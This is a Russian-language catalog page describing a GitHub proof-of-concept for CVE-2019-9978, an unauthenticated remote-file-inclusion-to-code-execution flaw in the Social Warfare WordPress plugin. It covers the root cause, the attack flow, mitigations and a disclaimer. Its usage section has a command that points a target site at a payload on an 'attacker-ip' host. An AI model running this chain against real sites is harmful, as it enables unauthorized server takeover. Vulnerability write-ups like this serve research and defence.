Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-9978-RCE-PoC — Кастомный Python proof-of-concept, демонстрирующий анализ первопричины и эксплуатацию CVE 2019-9978 (плагин Social Warfare), с акцентом на практическую цепочку атаки от RFI к RCE. | Kitploit
Инструменты/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

Кастомный Python proof-of-concept, демонстрирующий анализ первопричины и эксплуатацию CVE 2019-9978 (плагин Social Warfare), с акцентом на практическую цепочку атаки от RFI к RCE.

Репозиторий
219 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-9978 RCE PoC – эксплойт плагина Social Warfare WordPress

От неаутентифицированного удаленного включения файла (RFI) к удаленному выполнению кода (RCE)


📌 Описание

Этот репозиторий содержит Proof of Concept (PoC) на Python, демонстрирующий эксплуатацию CVE-2019-9978 — критической уязвимости в плагине Social Warfare для WordPress.

Уязвимость позволяет неаутентифицированному злоумышленнику выполнить Remote File Inclusion (RFI), что может быть повышено до Remote Code Execution (RCE)* путем размещения вредоносной нагрузки на сервере, контролируемом атакующим.

Этот PoC был разработан и протестирован в контролируемой лабораторной среде WordPress только в образовательных целях и для авторизованного тестирования безопасности.


🔍 Сводка по уязвимости

  • CVE ID: CVE-2019-9978
  • Затронутый компонент: Social Warfare (плагин WordPress)
  • Затронутые версии: ≤ 3.5.2
  • Тип уязвимости: Remote File Inclusion (RFI)
  • Воздействие: Remote Code Execution (RCE)
  • Требуется аутентификация: Нет
  • Вектор атаки: Удаленный
  • Критичность: Критическая

🧠 Анализ первопричины

Плагин Social Warfare не выполняет надлежащую проверку и очистку пользовательского ввода, используемого для удаленного включения контента.
В результате злоумышленник может указать вредоносный внешний URL, что приводит к неаутентифицированному удаленному включению файла.

Когда включенный удаленный файл содержит исполняемый PHP-код, он выполняется в контексте сервера WordPress, что приводит к удаленному выполнению кода.


🔄 Схема атаки

Unauthenticated HTTP Request
↓
Remote File Inclusion (External URL)
↓
Malicious Payload Execution
↓
Remote Code Execution (RCE)


🧪 Proof of Concept (PoC)

  1. Злоумышленник размещает вредоносную нагрузку на внешнем HTTP-сервере
  2. Уязвимая конечная точка Social Warfare включает удаленный файл
  3. Нагрузка выполняется на целевом сервере WordPress
  4. Злоумышленник получает удаленное выполнение команд
  5. Эксплойт-скрипт автоматизирует этот процесс для тестирования и исследовательских целей

▶️ Использование

Шаг 1: Разместите нагрузку

python3 -m http.server 8000

Поместите файл с нагрузкой (например, payload-main.txt) в директорию сервера.


Шаг 2: Запустите эксплойт

python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt

🛠 Требования

  • Python 3.x
  • Уязвимая версия плагина Social Warfare для WordPress
  • Тестовая среда WordPress
  • Локальный или удаленный HTTP-сервер для размещения нагрузки

🛡 Меры по смягчению и защите

  • Обновите плагин Social Warfare до пропатченной версии

  • Отключите удаленное включение файлов:

    allow_url_include = Off
    
  • Ограничьте обработку внешних URL в плагинах WordPress

  • Разверните межсетевой экран веб-приложения (WAF) с правилами обнаружения RFI


⚠️ Правовой отказ от ответственности

Этот проект предназначен строго для образовательных целей и авторизованного тестирования безопасности.

НЕ используйте этот Proof of Concept против систем без явного разрешения. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.


🔗 Ссылки и авторы

  • Первоначальный исследователь: Luka Sikic
  • Оригинальная ссылка на PoC: https://github.com/hash3liZer/CVE-2019-9978
  • Автор / адаптация: Vaidehi Muluru

Скачать инструмент